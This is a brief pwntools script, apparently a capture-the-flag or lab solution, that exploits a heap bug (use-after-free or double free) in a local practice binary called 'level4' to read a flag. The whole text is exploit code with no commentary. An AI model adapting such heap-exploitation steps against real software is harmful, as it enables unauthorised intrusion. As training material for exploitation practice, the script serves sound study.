from pwn import *
r = process("./level4")
r.read()
r.sendline("malloc")
r.sendline("813")
r.sendline("malloc")
r.sendline("813")
r.sendline("free")
r.sendline("scanf")
r.sendline("11111111")
r.sendline("free")
r.sendline("read_flag")
r.sendline("puts")
r.interactive()
